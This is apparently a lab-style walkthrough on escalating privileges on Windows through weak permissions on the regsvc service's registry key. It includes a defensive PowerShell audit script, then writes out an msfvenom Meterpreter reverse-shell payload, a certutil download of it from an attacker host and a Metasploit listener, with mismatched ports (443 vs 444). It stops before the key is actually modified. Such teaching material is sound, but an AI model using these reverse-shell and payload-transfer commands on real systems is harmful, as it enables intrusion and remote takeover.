In this section we will learn how to exploit weak registry permissions.

Now, let’s start by querying the configuration of the regsvc service.

sc qc regsvc


Now, let’s check the permissions on this service’s registry key.

accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc


Notice that interactive users have all-access permissions on this registry key.
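The same check can be run across every service key when auditing a host. The script below is an added example, not part of the original walkthrough; the list of broad groups and the choice of rights treated as "write" are assumptions made for this audit.

```powershell
# Added example (not from the original page): report service registry keys
# whose ACL lets broad, non-administrative groups modify them.
$servicesRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'

# Well-known SIDs of broad groups (assumed audit scope); SIDs avoid localized names.
$lowPrivSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-4'      = 'NT AUTHORITY\INTERACTIVE'
    'S-1-5-11'     = 'NT AUTHORITY\Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
}

# Rights that allow changing the service configuration or the key's ACL.
$rr = [System.Security.AccessControl.RegistryRights]
$writeMask = [int]($rr::SetValue -bor $rr::CreateSubKey -bor
                   $rr::ChangePermissions -bor $rr::TakeOwnership)
# Inherit-only ACEs can carry generic rights instead of key-specific ones.
$writeMask = $writeMask -bor 0x40000000 -bor 0x10000000   # GENERIC_WRITE, GENERIC_ALL

$findings = foreach ($key in Get-ChildItem -Path $servicesRoot -ErrorAction SilentlyContinue) {
    try { $acl = Get-Acl -Path $key.PSPath -ErrorAction Stop } catch { continue }
    $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
    foreach ($ace in $rules) {
        $sid = $ace.IdentityReference.Value
        if ($ace.AccessControlType -ne 'Allow' -or -not $lowPrivSids.ContainsKey($sid)) { continue }
        if ([int]$ace.RegistryRights -band $writeMask) {
            [pscustomobject]@{
                Service   = $key.PSChildName
                Principal = $lowPrivSids[$sid]
                Rights    = $ace.RegistryRights
                ImagePath = (Get-ItemProperty -Path $key.PSPath -Name ImagePath `
                                 -ErrorAction SilentlyContinue).ImagePath
            }
        }
    }
}

# An empty result means no service key is writable by the groups listed above.
$findings | Sort-Object Service | Format-Table -AutoSize -Wrap
```

Any row returned should be remediated by removing the write ACE from that key, leaving write access to SYSTEM and Administrators only.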

Now, let’s exploit the vulnerability.

  1. Let’s create a payload using msfvenom.
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.8.44.22 LPORT=443 -f exe -o administrator.exe


Now, let’s transfer the file to the victim machine.

certutil -urlcache -f http://10.8.44.22/administrator.exe administrator.exe


Now, let’s open a listener on our machine.

set payload windows/x64/meterpreter/reverse_https
set lhost tun0
set lport 444
exploit


We are now listening.